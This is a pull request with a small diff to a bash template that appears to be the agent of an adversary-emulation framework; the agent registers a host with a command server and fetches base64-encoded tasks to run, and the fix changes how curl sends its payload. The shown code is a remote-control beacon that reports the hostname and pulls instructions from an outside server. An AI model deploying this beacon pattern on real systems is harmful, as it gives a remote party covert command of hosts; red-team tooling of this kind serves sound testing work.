### PR TITLE
Quick fix for newlines breaking curl

### DIFF
--- a/templates/54ndc47.sh
+++ b/templates/54ndc47.sh
@@ -11,13 +11,13 @@ function getJsonVal () {
 
 function registration {
     body=$(echo '{"paw":"'"$paw"'","host":"'"$(hostname)"'","executor":"bash","group":"'"$group"'"}' | base64)
-    results=$(curl -sk -X POST -d $body $server/sand/register)
+    results=$(echo "$body" | curl -sk -X POST -d @- $server/sand/register)
     register=$(base64 --decode <<< ${results})
 }
 
 function getInstructions {
     body=$(echo '{"paw":"'"$paw"'","host":"'"$(hostname)"'","executor":"bash"}' | base64)
-    encodedTask=$(curl -sk -X POST -d $body $server/sand/instructions)
+    encodedTask=$(echo "$body" | curl -sk -X POST -d @- $server/sand/instructions)
     task=$(base64 --decode <<< ${encodedTask})
 }
 


### PR DESCRIPTION
In certain situations, newlines break curl transmissions. This fixes this issue, as well as the max length limit on uploading information via curl.